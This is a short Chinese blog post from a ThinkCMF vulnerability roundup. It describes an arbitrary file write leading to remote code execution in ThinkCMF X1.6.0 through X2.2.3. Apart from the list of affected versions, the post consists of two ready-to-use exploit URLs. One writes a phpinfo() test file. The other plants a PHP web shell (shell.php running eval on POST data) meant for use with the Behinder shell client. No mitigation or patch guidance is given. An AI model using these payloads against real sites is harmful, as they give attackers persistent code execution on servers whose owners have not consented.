应用安全 - CMS - ThinkCMF - 漏洞汇总

ThinkCMF X1.6.0-X2.2.3任意内容包含漏洞

Date:
2019.10

类型:
任意文件写入导致远程代码执行

影响范围:
ThinkCMF X1.6.0
ThinkCMF X2.1.0
ThinkCMF X2.2.0
ThinkCMF X2.2.1
ThinkCMF X2.2.2
ThinkCMF X2.2.3

复现:
写入phpinfo()
http://127.0.0.1/cmfx-master/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>
写入PHP后门
http://127.0.0.1/cmfx-master/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[1]); ?>')</php>
冰蝎成功截图:

 

posted @ 2019-11-22 15:15  7hang  阅读(523)  评论(0编辑  收藏  举报